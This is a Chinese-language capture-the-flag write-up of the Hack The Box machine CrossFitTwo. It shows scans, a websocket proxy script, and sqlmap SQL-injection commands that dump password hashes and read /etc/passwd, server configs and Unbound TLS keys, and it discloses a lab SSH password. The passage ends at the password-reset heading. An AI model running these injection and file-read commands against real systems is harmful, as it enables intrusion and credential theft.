基本信息

https://www.hackthebox.eu/home/machines/profile/322
10.10.10.232

端口扫描

需要全端口，22,80,8953:

$ nmap -p- 10.10.10.232
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-11 14:39 CST
Nmap scan report for 10.10.10.232
Host is up (0.067s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8953/tcp open  ub-dns-control

Nmap done: 1 IP address (1 host up) scanned in 914.51 seconds

$ nmap -sC -sV -Pn -p22,80,8953 10.10.10.232

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-11 15:08 CST
WARNING: Service 10.10.10.232:80 had already soft-matched http, but now soft-matched rtsp; ignoring second value
WARNING: Service 10.10.10.232:80 had already soft-matched http, but now soft-matched rtsp; ignoring second value
Nmap scan report for employees.crossfit.htb (10.10.10.232)
Host is up (0.067s latency).

PORT     STATE SERVICE             VERSION
22/tcp   open  ssh                 OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
|   3072 35:0a:81:06:de:be:8c:d8:d7:27:66:db:96:94:fd:52 (RSA)
|   256 94:60:55:35:9a:1a:a8:45:a1:ae:19:cd:61:05:ec:3f (ECDSA)
|_  256 a2:c8:6b:6e:11:b6:70:69:db:d2:60:2e:2f:d1:2f:ab (ED25519)
80/tcp   open  http                (PHP 7.4.12)
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.0 200 OK
|     Connection: close
|     Connection: close
|     Content-type: text/html; charset=UTF-8
|     Date: Tue, 11 May 2021 07:08:01 GMT
|     Server: OpenBSD httpd
|     X-Powered-By: PHP/7.4.12
|     <!DOCTYPE html>
|     <html lang="zxx">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="description" content="Yoga StudioCrossFit">
|     <meta name="keywords" content="Yoga, unica, creative, html">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <meta http-equiv="X-UA-Compatible" content="ie=edge">
|     <title>CrossFit</title>
|     <!-- Google Font -->
|     <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&display=swap" rel="stylesheet">
|     <link href="https://fonts.googleapis.com/css?family=Oswald:400,500,600,700&display=swap" rel="stylesheet">
|     <!-- Css Styles -->
|     <link rel="stylesheet" href="css/bootstrap.min.css" type="text/css">
|_    <link rel="styleshe
|_http-server-header: OpenBSD httpd
|_http-title: Login
8953/tcp open  ssl/ub-dns-control?
| ssl-cert: Subject: commonName=unbound
| Not valid before: 2021-01-11T07:01:10
|_Not valid after:  2040-09-28T07:01:10
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.91%I=7%D=5/11%Time=609A2D63%P=x86_64-apple-darwin19.6.0%
SF:r(GetRequest,3541,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nCo
SF:nnection:\x20close\r\nContent-type:\x20text/html;\x20charset=UTF-8\r\nD
SF:ate:\x20Tue,\x2011\x20May\x202021\x2007:08:01\x20GMT\r\nServer:\x20Open
SF:BSD\x20httpd\r\nX-Powered-By:\x20PHP/7\.4\.12\r\n\r\n<!DOCTYPE\x20html>
SF:\n<html\x20lang=\"zxx\">\n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"
SF:UTF-8\">\n\x20\x20\x20\x20<meta\x20name=\"description\"\x20content=\"Yo
SF:ga\x20StudioCrossFit\">\n\x20\x20\x20\x20<meta\x20name=\"keywords\"\x20
SF:content=\"Yoga,\x20unica,\x20creative,\x20html\">\n\x20\x20\x20\x20<met
SF:a\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-scal
SF:e=1\.0\">\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20c
SF:ontent=\"ie=edge\">\n\x20\x20\x20\x20<title>CrossFit</title>\n\n\x20\x2
SF:0\x20\x20<!--\x20Google\x20Font\x20-->\n\x20\x20\x20\x20<link\x20href=\
SF:"https://fonts\.googleapis\.com/css\?family=PT\+Sans:400,700&display=sw
SF:ap\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20<link\x20href=\"https://fo
SF:nts\.googleapis\.com/css\?family=Oswald:400,500,600,700&display=swap\"\
SF:x20rel=\"stylesheet\">\n\n\x20\x20\x20\x20<!--\x20Css\x20Styles\x20-->\
SF:n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.m
SF:in\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesh
SF:e")%r(HTTPOptions,3541,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\
SF:r\nConnection:\x20close\r\nContent-type:\x20text/html;\x20charset=UTF-8
SF:\r\nDate:\x20Tue,\x2011\x20May\x202021\x2007:08:01\x20GMT\r\nServer:\x2
SF:0OpenBSD\x20httpd\r\nX-Powered-By:\x20PHP/7\.4\.12\r\n\r\n<!DOCTYPE\x20
SF:html>\n<html\x20lang=\"zxx\">\n\n<head>\n\x20\x20\x20\x20<meta\x20chars
SF:et=\"UTF-8\">\n\x20\x20\x20\x20<meta\x20name=\"description\"\x20content
SF:=\"Yoga\x20StudioCrossFit\">\n\x20\x20\x20\x20<meta\x20name=\"keywords\
SF:"\x20content=\"Yoga,\x20unica,\x20creative,\x20html\">\n\x20\x20\x20\x2
SF:0<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial
SF:-scale=1\.0\">\n\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"
SF:\x20content=\"ie=edge\">\n\x20\x20\x20\x20<title>CrossFit</title>\n\n\x
SF:20\x20\x20\x20<!--\x20Google\x20Font\x20-->\n\x20\x20\x20\x20<link\x20h
SF:ref=\"https://fonts\.googleapis\.com/css\?family=PT\+Sans:400,700&displ
SF:ay=swap\"\x20rel=\"stylesheet\">\n\x20\x20\x20\x20<link\x20href=\"https
SF:://fonts\.googleapis\.com/css\?family=Oswald:400,500,600,700&display=sw
SF:ap\"\x20rel=\"stylesheet\">\n\n\x20\x20\x20\x20<!--\x20Css\x20Styles\x2
SF:0-->\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstr
SF:ap\.min\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:yleshe");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.06 seconds

80

member area是一个子域名，加hosts：

1	10.10.10.232 employees.crossfit.htb crossfit.htb

employees.crossfit.htb

目录扫描

对两个系统目录扫描，没什么有用的：

gobuster dir -u http://10.10.10.232/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -b 403,404 -t 50

/about-us.php         (Status: 200) [Size: 15733]
/blog.php             (Status: 200) [Size: 15369]
/classes.php          (Status: 200) [Size: 25946]
/contact.php          (Status: 200) [Size: 8007]
/css                  (Status: 301) [Size: 510] [--> http://10.10.10.232/css/]
/elements.php         (Status: 200) [Size: 19654]
/fonts                (Status: 301) [Size: 510] [--> http://10.10.10.232/fonts/]
/img                  (Status: 301) [Size: 510] [--> http://10.10.10.232/img/]
/images               (Status: 301) [Size: 510] [--> http://10.10.10.232/images/]
/index.php            (Status: 200) [Size: 19041]
/index.php            (Status: 200) [Size: 19041]
/js                   (Status: 301) [Size: 510] [--> http://10.10.10.232/js/]
/main.html            (Status: 200) [Size: 931]
/readme.txt           (Status: 200) [Size: 410]
/vendor               (Status: 301) [Size: 510] [--> http://10.10.10.232/vendor/]

gobuster dir -u http://employees.crossfit.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt -b 403,404 -t 50

/css                  (Status: 301) [Size: 510] [--> http://employees.crossfit.htb/css/]
/index.php            (Status: 200) [Size: 4412]
/index.php            (Status: 200) [Size: 4412]
/js                   (Status: 301) [Size: 510] [--> http://employees.crossfit.htb/js/]
/vendor               (Status: 301) [Size: 510] [--> http://employees.crossfit.htb/vendor/]

websocket

查看流量可以发现一个gym.crossfit.htb的websocket：

这个域名同样加hosts，相关代码在ws.min.js里：

chat

加完hosts后访问，右下角有个聊天框，31秒自动消失：

并且有一次性token，每次响应新token，下次请求使用：

websocket-client

所以可以自己写一个client，枚举信息：

https://amphp.org/websocket-client/

1
2
3

composer require amphp/websocket-client

php -S 0.0.0.0:7777

ws.min.js

function updateScroll() {
  var e = document.getElementById('chats');
  e.scrollTop = e.scrollHeight
}
var token,
ws = new WebSocket('ws://gym.crossfit.htb/ws/'),
pingTimeout = setTimeout(() =>{
  ws.close(),
  $('.chat-main').remove()
}, 31000);
function check_availability(e) {
  var s = new Object;
  s.message = 'available',
  s.params = String(e),
  s.token = token,
  ws.send(JSON.stringify(s))
}
$('.chat-content').slideUp(),
$('.hide-chat-box').click(function () {
  $('.chat-content').slideUp()
}),
$('.show-chat-box').click(function () {
  $('.chat-content').slideDown(),
  updateScroll()
}),
$('.close-chat-box').click(function () {
  $('.chat-main').remove()
}),
ws.onopen = function () {
},
ws.onmessage = function (e) {
  'ping' === e.data ? (ws.send('pong'), clearTimeout(pingTimeout)) : (response = JSON.parse(e.data), answer = response.message, answer.startsWith('Hello!') && $('#ws').show(), token = response.token, $('#chat-messages').append('<li class="receive-msg float-left mb-2"><div class="receive-msg-desc float-left ml-2"><p class="msg_display bg-white m-0 pt-1 pb-1 pl-2 pr-2 rounded">' + answer + '</p></div></li>'), updateScroll())
},
$('#sendmsg').on('keypress', function (e) {
  if (13 === e.which) {
    $(this).attr('disabled', 'disabled');
    var s = $('#sendmsg').val();
    if ('' !== s) {
      $('#chat-messages').append('<li class="send-msg float-right mb-2"><p class="msg_display pt-1 pb-1 pl-2 pr-2 m-0 rounded">' + s + '</p></li>');
      var t = new Object;
      t.message = s,
      t.token = token,
      ws.send(JSON.stringify(t)),
      $('#sendmsg').val(''),
      $(this).removeAttr('disabled'),
      updateScroll()
    }
  }
});

websocket-client.php

<?php

require 'vendor/autoload.php';

use Amp\Websocket\Client;

Amp\Loop::run(function () {
    $connection = yield Client\connect('ws://gym.crossfit.htb/ws/');
    $message = yield $connection->receive();
    $payload = yield $message->buffer();
    $token   = json_decode($payload, true)["token"];
    $check   = json_encode(array('message' => 'available', 'params' => $_GET['id'], 'token' => $token));
    yield $connection->send($check);
    $message = yield $connection->receive();
    $payload = yield $message->buffer();
    header("Content-Type: application/json");
    printf($payload);

    $connection->close();
});

sql注入

websocket获取信息也是通过数据库，因此可以进行sql注入：

1 2	sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10

dbs

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 --dbs

available databases [3]:
[*] crossfit
[*] employees
[*] information_schema

employees

两张表，一张是账号信息，一张是密码重置token：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees --tables

Database: employees
[2 tables]
+----------------+
| employees      |
| password_reset |
+----------------+

employees table

david.palmer@crossfit.htb是administrator：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees -T employees --dump

Database: employees
Table: employees
[4 entries]
+----+-----------------------------+---------------+------------------------------------------------------------------+
| id | email                       | username      | password                                                         |
+----+-----------------------------+---------------+------------------------------------------------------------------+
| 1  | david.palmer@crossfit.htb   | administrator | fff34363f4d15e958f0fb9a7c2e7cc550a5672321d54b5712cd6e4fa17cd2ac8 |
| 2  | will.smith@crossfit.htb     | wsmith        | 06b4daca29092671e44ef8fad8ee38783b4294d9305853027d1b48029eac0683 |
| 3  | maria.williams@crossfit.htb | mwilliams     | fe46198cb29909e5dd9f61af986ca8d6b4b875337261bdaa5204f29582462a9c |
| 4  | jack.parker@crossfit.htb    | jparker       | 4de9923aba6554d148dbcd3369ff7c6e71841286e5106a69e250f779770b3648 |
+----+-----------------------------+---------------+------------------------------------------------------------------+

password_reset table

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees -T password_reset --dump

Database: employees
Table: password_reset
[0 entries]
+-------+-------+---------+
| token | email | expires |
+-------+-------+---------+
+-------+-------+---------+

password_reset

尝试去reset administrator密码：

表里可以得到token，但现在不知道使用格式：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10 -D employees -T password_reset --dump --fresh-queries

Database: employees
Table: password_reset
[1 entry]
+------------------------------------------------------------------+---------------------------+---------------------+
| token                                                            | email                     | expires             |
+------------------------------------------------------------------+---------------------------+---------------------+
| 5fda7b56a8c5b514a528fc02fcf583584436aa28b7eafe2db0790c36a805a284 | david.palmer@crossfit.htb | 2021-05-11 08:54:10 |
+------------------------------------------------------------------+---------------------------+---------------------+

文件读取

需要继续枚举，尝试sql读文件(非常慢),opembsd相关配置文件：

https://man.openbsd.org/?query=config&apropos=1&sec=5&arch=default&manpath=OpenBSD-current

/etc/passwd

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/passwd"

root:*:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28:portmap:/var/empty:/sbin/nologin
_identd:*:29:29:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30:rpc.rstatd:/var/empty:/sbin/nologin
_rusersd:*:32:32:rpc.rusersd:/var/empty:/sbin/nologin
_fingerd:*:33:33:fingerd:/var/empty:/sbin/nologin
_x11:*:35:35:X Server:/var/empty:/sbin/nologin
_unwind:*:48:48:Unwind Daemon:/var/empty:/sbin/nologin
_switchd:*:49:49:Switch Daemon:/var/empty:/sbin/nologin
_traceroute:*:50:50:traceroute privdrop user:/var/empty:/sbin/nologin
_ping:*:51:51:ping privdrop user:/var/empty:/sbin/nologin
_unbound:*:53:53:Unbound Daemon:/var/unbound:/sbin/nologin
_dpb:*:54:54:dpb privsep:/var/empty:/sbin/nologin
_pbuild:*:55:55:dpb build user:/nonexistent:/sbin/nologin
_pfetch:*:56:56:dpb fetch user:/nonexistent:/sbin/nologin
_pkgfetch:*:57:57:pkg fetch user:/nonexistent:/sbin/nologin
_pkguntar:*:58:58:pkg untar user:/nonexistent:/sbin/nologin
_spamd:*:62:62:Spam Daemon:/var/empty:/sbin/nologin
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
_isakmpd:*:68:68:isakmpd privsep:/var/empty:/sbin/nologin
_rpki-client:*:70:70:rpki-client user:/nonexistent:/sbin/nologin
_syslogd:*:73:73:Syslog Daemon:/var/empty:/sbin/nologin
_pflogd:*:74:74:pflogd privsep:/var/empty:/sbin/nologin
_bgpd:*:75:75:BGP Daemon:/var/empty:/sbin/nologin
_tcpdump:*:76:76:tcpdump privsep:/var/empty:/sbin/nologin
_dhcp:*:77:77:DHCP programs:/var/empty:/sbin/nologin
_mopd:*:78:78:MOP Daemon:/var/empty:/sbin/nologin
_tftpd:*:79:79:TFTP Daemon:/var/empty:/sbin/nologin
_rbootd:*:80:80:rbootd Daemon:/var/empty:/sbin/nologin
_ppp:*:82:82:PPP utilities:/var/empty:/sbin/nologin
_ntp:*:83:83:NTP Daemon:/var/empty:/sbin/nologin
_ftp:*:84:84:FTP Daemon:/var/empty:/sbin/nologin
_ospfd:*:85:85:OSPF Daemon:/var/empty:/sbin/nologin
_hostapd:*:86:86:HostAP Daemon:/var/empty:/sbin/nologin
_dvmrpd:*:87:87:DVMRP Daemon:/var/empty:/sbin/nologin
_ripd:*:88:88:RIP Daemon:/var/empty:/sbin/nologin
_relayd:*:89:89:Relay Daemon:/var/empty:/sbin/nologin
_ospf6d:*:90:90:OSPF6 Daemon:/var/empty:/sbin/nologin
_snmpd:*:91:91:SNMP Daemon:/var/empty:/sbin/nologin
_ypldap:*:93:93:YP to LDAP Daemon:/var/empty:/sbin/nologin
_rad:*:94:94:IPv6 Router Advertisement Daemon:/var/empty:/sbin/nologin
_smtpd:*:95:95:SMTP Daemon:/var/empty:/sbin/nologin
_rwalld:*:96:96:rpc.rwalld:/var/empty:/sbin/nologin
_nsd:*:97:97:NSD Daemon:/var/empty:/sbin/nologin
_ldpd:*:98:98:LDP Daemon:/var/empty:/sbin/nologin
_sndio:*:99:99:sndio privsep:/var/empty:/sbin/nologin
_ldapd:*:100:100:LDAP Daemon:/var/empty:/sbin/nologin
_iked:*:101:101:IKEv2 Daemon:/var/empty:/sbin/nologin
_iscsid:*:102:102:iSCSI Daemon:/var/empty:/sbin/nologin
_smtpq:*:103:103:SMTP Daemon:/var/empty:/sbin/nologin
_file:*:104:104:file privsep:/var/empty:/sbin/nologin
_radiusd:*:105:105:RADIUS Daemon:/var/empty:/sbin/nologin
_eigrpd:*:106:106:EIGRP Daemon:/var/empty:/sbin/nologin
_vmd:*:107:107:VM Daemon:/var/empty:/sbin/nologin
_tftp_proxy:*:108:108:tftp proxy daemon:/nonexistent:/sbin/nologin
_ftp_proxy:*:109:109:ftp proxy daemon:/nonexistent:/sbin/nologin
_sndiop:*:110:110:sndio privileged user:/var/empty:/sbin/nologin
_syspatch:*:112:112:syspatch unprivileged user:/var/empty:/sbin/nologin
_slaacd:*:115:115:SLAAC Daemon:/var/empty:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
_mysql:*:502:502:MySQL Account:/nonexistent:/sbin/nologin
lucille:*:1002:1002:,,,:/home/lucille:/bin/csh
node:*:1003:1003::/home/node:/bin/ksh
_dbus:*:572:572:dbus user:/nonexistent:/sbin/nologin
_redis:*:686:686:redis account:/var/redis:/sbin/nologin
david:*:1004:1004:,,,:/home/david:/bin/csh
john:*:1005:1005::/home/john:/bin/csh
ftp:*:1006:1006:FTP:/home/ftp:/sbin/nologin

根据配置文件，使用有yubikey：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/login.conf"

# $OpenBSD: login.conf,v 1.16 2020/06/23 15:45:34 naddy Exp $

#
# Sample login.conf file.  See login.conf(5) for details.
#

#
# Standard authentication styles:
#
# passwd	Use only the local password file
# chpass	Do not authenticate, but change user's password (change
#		the YP password if the user has one, else change the
#		local password)
# lchpass	Do not login; change user's local password instead
# radius	Use radius authentication
# reject	Use rejected authentication
# skey		Use S/Key authentication
# activ		ActivCard X9.9 token authentication
# crypto	CRYPTOCard X9.9 token authentication
# snk		Digital Pathways SecureNet Key authentication
# tis		TIS Firewall Toolkit authentication
# token		Generic X9.9 token authentication
# yubikey	YubiKey authentication
#

# Default allowed authentication styles
auth-defaults:auth=passwd,skey:

# Default allowed authentication styles for authentication type ftp
auth-ftp-defaults:auth-ftp=passwd:

#
# The default values
# To alter the default authentication types change the line:
#	:tc=auth-defaults:\
# to read something like: (enables passwd, "myauth", and activ)
#	:auth=passwd,myauth,activ:\
# Any value changed in the daemon class should be reset in default
# class.
#
default:\
	:path=/usr/bin /bin /usr/sbin /sbin /usr/X11R6/bin /usr/local/bin /usr/local/sbin:\
	:umask=022:\
	:datasize-max=768M:\
	:datasize-cur=768M:\
	:maxproc-max=256:\
	:maxproc-cur=128:\
	:openfiles-max=102400:\
	:openfiles-cur=102400:\
	:stacksize-cur=4M:\
	:localcipher=blowfish,a:\
	:tc=auth-defaults:\
	:tc=auth-ftp-defaults:

#
# Settings used by /etc/rc and root
# This must be set properly for daemons started as root by inetd as well.
# Be sure to reset these values to system defaults in the default class!
#
daemon:\
	:ignorenologin:\
	:datasize=infinity:\
	:maxproc=infinity:\
	:openfiles-max=102400:\
	:openfiles-cur=102400:\
	:stacksize-cur=8M:\
	:auth-ssh=yubikey:\
	:auth-su=reject:\
	:tc=default:

#
# Staff have fewer restrictions and can login even when nologins are set.
#
staff:\
	:datasize-cur=1536M:\
	:datasize-max=infinity:\
	:maxproc-max=512:\
	:maxproc-cur=256:\
	:ignorenologin:\
	:requirehome@:\
	:tc=default:

#
# Authpf accounts get a special motd and shell
#
authpf:\
	:welcome=/etc/motd.authpf:\
	:shell=/usr/sbin/authpf:\
	:tc=default:

#
# Building ports with DPB uses raised limits
#
pbuild:\
	:datasize-max=infinity:\
	:datasize-cur=8192M:\
	:maxproc-max=1024:\
	:maxproc-cur=384:\
	:priority=5:\
	:tc=default:

#
# Override resource limits for certain daemons started by rc.d(8)
#
bgpd:\
	:openfiles=512:\
	:tc=daemon:

unbound:\
	:openfiles=512:\
	:tc=daemon:

/etc/ssh/sshd_config

root需要公钥和密码，非root需要密码

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/ssh/sshd_config"

#	$OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile	.ssh/authorized_keys

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
#ChallengeResponseAuthentication yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem	sftp	/usr/libexec/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#	X11Forwarding no
#	AllowTcpForwarding no
#	PermitTTY no
#	ForceCommand cvs server

Match User root
	AuthenticationMethods publickey,password
Match User *,!root
	AuthenticationMethods password

/etc/httpd.conf

根据配置文件，除了chat和employees还有其他的：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/httpd.conf"

# $OpenBSD: httpd.conf,v 1.20 2018/06/13 15:08:24 reyk Exp $


types {
    include "/usr/share/misc/mime.types"
}

server "0.0.0.0" {
        no log
        listen on lo0 port 8000

        root "/htdocs"
        directory index index.php

        location "*.php*" {
                fastcgi socket "/run/php-fpm.sock"
        }
}

server "employees" {
        no log
        listen on lo0 port 8001

        root "/htdocs_employees"
        directory index index.php

        location "*.php*" {
                fastcgi socket "/run/php-fpm.sock"
        }
}

server "chat" {
        no log
        listen on lo0 port 8002

        root "/htdocs_chat"
        directory index index.html

        location match "^/home$" {
            request rewrite "/index.html"
        }
        location match "^/login$" {
            request rewrite "/index.html"
        }
        location match "^/chat$" {
            request rewrite "/index.html"
        }
        location match "^/favicon.ico$" {
            request rewrite "/images/cross.png"
        }
}

/etc/relayd.conf

得到crossfit-club.htb，加hosts：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/etc/relayd.conf"

table<1>{127.0.0.1}
table<2>{127.0.0.1}
table<3>{127.0.0.1}
table<4>{127.0.0.1}
http protocol web{
        pass request quick header "Host" value "*crossfit-club.htb" forward to <3>
        pass request quick header "Host" value "*employees.crossfit.htb" forward to <2>
        match request path "/*" forward to <1>
        match request path "/ws*" forward to <4>
        http websockets
}

table<5>{127.0.0.1}
table<6>{127.0.0.1 127.0.0.2 127.0.0.3 127.0.0.4}
http protocol portal{
        pass request quick path "/" forward to <5>
        pass request quick path "/index.html" forward to <5>
        pass request quick path "/home" forward to <5>
        pass request quick path "/login" forward to <5>
        pass request quick path "/chat" forward to <5>
        pass request quick path "/js/*" forward to <5>
        pass request quick path "/css/*" forward to <5>
        pass request quick path "/fonts/*" forward to <5>
        pass request quick path "/images/*" forward to <5>
        pass request quick path "/favicon.ico" forward to <5>
        pass forward to <6>
        http websockets
}

relay web{
        listen on "0.0.0.0" port 80
        protocol web
        forward to <1> port 8000
        forward to <2> port 8001
        forward to <3> port 9999
        forward to <4> port 4419
}

relay portal{
        listen on 127.0.0.1 port 9999
        protocol portal
        forward to <5> port 8002
        forward to <6> port 5000 mode source-hash
}

crossfit-club.htb

另一个需要登录的：

api enum

查看流量发现/api/auth，那就枚举其他api：

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -e -t 20 -x json -u http://crossfit-club.htb/api/

http://crossfit-club.htb/api/auth                 (Status: 200) [Size: 66]
http://crossfit-club.htb/api/ping                 (Status: 200) [Size: 71]

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -e -t 20 -x json -m POST -u http://crossfit-club.htb/api/

http://crossfit-club.htb/api/Login                (Status: 200) [Size: 50]
http://crossfit-club.htb/api/login                (Status: 200) [Size: 50]
http://crossfit-club.htb/api/signup               (Status: 200) [Size: 50]

api里发现signup,网页的signup是禁用，尝试直接通过api：

响应只有管理员可以添加用户，无法注册：

#!/bin/bash

RHOST="crossfit-club.htb"
RPORT=80
USER="miao"
PASS='miao@123'
EMAIL="miao@crossfit.htb"
COOKIE="$(mktemp -u)"
PROXY="127.0.0.1:8087"

# Get CSRF token
TOKEN=$(curl -s \
             -c "${COOKIE}" \
             -x "${PROXY}" \
             "http://${RHOST}:${RPORT}/api/auth" \
        | jq .token \
        | tr -d '"')

# Sign up
cat - <<EOF > signup.json
{
    "username": "${USER}",
    "password": "${PASS}",
    "email"   : "${EMAIL}",
    "confirm" : "${EMAIL}"
}
EOF

curl -s \
     -b "${COOKIE}" \
     -H "Content-Type: application/json" \
     -H "X-CSRF-TOKEN: ${TOKEN}" \
     -d "$(cat signup.json | jq -c)" \
     -x "${PROXY}" \
     "http://${RHOST}:${RPORT}/api/signup" | jq .

# Clean up
rm -rf "${COOKIE}"

Unbound

注意前面还有个8953端口，这个是Unbound的control-port，而unbound-control需要server证书，客户端密钥，客户端证书几个文件，还是通过sql去读文件获取：

https://man.openbsd.org/unbound.conf

/var/unbound/etc/unbound.conf

首先读取配置文件，根据配置文件得到相关文件路径：

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/var/unbound/etc/unbound.conf"

server:
        interface: 127.0.0.1
        interface: ::1
        access-control: 0.0.0.0/0 refuse
        access-control: 127.0.0.0/8 allow
        access-control: ::0/0 refuse
        access-control: ::1 allow
        hide-identity: yes
        hide-version: yes
        msg-cache-size: 0
        rrset-cache-size: 0
        cache-max-ttl: 0
        cache-max-negative-ttl: 0
        auto-trust-anchor-file: "/var/unbound/db/root.key"
        val-log-level: 2
        aggressive-nsec: yes
        include: "/var/unbound/etc/conf.d/local_zones.conf"

remote-control:
        control-enable: yes
        control-interface: 0.0.0.0
        control-use-cert: yes
        server-key-file: "/var/unbound/etc/tls/unbound_server.key"
        server-cert-file: "/var/unbound/etc/tls/unbound_server.pem"
        control-key-file: "/var/unbound/etc/tls/unbound_control.key"
        control-cert-file: "/var/unbound/etc/tls/unbound_control.pem"

download files

下载所需的几个文件：

1
2
3

sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/var/unbound/etc/tls/unbound_server.pem" 
sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/var/unbound/etc/tls/unbound_control.key"
sqlmap -u http://10.211.55.12:7777/client.php\?id\=1 --batch --string='Good news!' --technique=B --threads=10  --file-read="/var/unbound/etc/tls/unbound_control.pem"

如果嫌太慢就直接scp吧，这里直接给出来后面才能得到的密码：

scp david@10.10.10.232:/var/unbound/etc/tls/unbound_server.pem unbound_server.pem
scp david@10.10.10.232:/var/unbound/etc/tls/unbound_control.key unbound_control.key
scp david@10.10.10.232:/var/unbound/etc/tls/unbound_control.pem unbound_control.pem


ssh david@10.10.10.232
NWBFcSe3ws4VDhTB

status

之后使用本地配置文件，测试remote control：

crossfit.conf

remote-control:
    server-cert-file: "/home/miao/Desktop/HTB/CrossFitTwo/unbound_server.pem"
    control-key-file: "//home/miao/Desktop/HTB/CrossFitTwo/unbound_control.key"
    control-cert-file: "/home/miao/Desktop/HTB/CrossFitTwo/unbound_control.pem"

密码重置 & dns rebind

